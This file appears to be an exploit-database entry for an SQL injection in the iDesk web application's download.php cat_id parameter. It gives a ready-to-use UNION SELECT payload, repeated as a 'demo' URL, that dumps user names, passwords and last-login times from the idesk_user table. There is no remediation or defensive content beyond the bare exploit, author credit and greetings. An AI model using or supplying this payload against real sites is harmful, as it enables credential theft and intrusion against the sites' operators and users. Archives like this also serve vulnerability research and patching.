exploit-db-mirror/platforms/php/webapps/10401.txt

###############################################################
##############################################################
##
##  SQL Injection Vulnerability ( download.php cat_id )
##
## iDesk
##
## 
##
###############################################################
###############################################################
##
## AuTh0r : Manas58
##
## H0ME   : www.1923turk.biz
##
## 
##
########################
########################
##
## [ Exploit ]        
##
##     download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
## http://www.site.com/download.php?cat_id=sql
##
##
## [DEMO ] 
## http://server/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
########################
########################
 

#########################################################################################################
#########################################################################################################
                                  
                                        
:: BAYBORA :: Tiamo  :: Delibey :: 
#########################################################################################################
#########################################################################################################